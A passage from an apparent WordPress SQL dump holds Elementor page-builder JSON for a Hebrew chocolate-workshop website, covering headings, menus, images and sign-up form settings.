,\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(357,88,'_elementor_version','0.4'),(359,89,'_wp_page_template','elementor_canvas'),(360,89,'_elementor_edit_mode','builder'),(361,89,'_elementor_template_type','post'),(362,89,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4f74ca63\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#e3e0dd\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"20\",\"bottom\":\"70\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"655473aa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"55.702\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"12\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"13679594\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05d7\\u05d1\\u05e8\\u05d9\\u05dd\",\"align\":\"right\",\"title_color\":\"#40272c\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"35\"},\"typography_font_family\":\"Damion\",\"typography_font_weight\":\"100\",\"typography_text_transform\":\"capitalize\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"align_mobile\":\"center\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"31\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"30\"}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"66f30f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05e9\\u05d0\\u05d7\\u05e8\\u05d9, \\u05d7\\u05dc\\u05e7\\u05e0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05d1\\u05d0\\u05e8\\u05d5\\u05d7\\u05ea \\u05d4\\u05e2\\u05e8\\u05d1 \\u05e8\\u05e7 \\u05db\\u05d3\\u05d9 \\u05e9\\u05e0\\u05d5\\u05db\\u05dc \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05ea\\u05e4\\u05e8\\u05d9\\u05d8 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e2\\u05d3 \\u05ea\\u05d5\\u05de\\u05d5, \\u05d0\\u05d6 \\u05dc\\u05de\\u05d4 \\u05e9\\u05dc\\u05d0 \\u05e0\\u05e2\\u05e9\\u05d4 \\u05d9\\u05d5\\u05dd 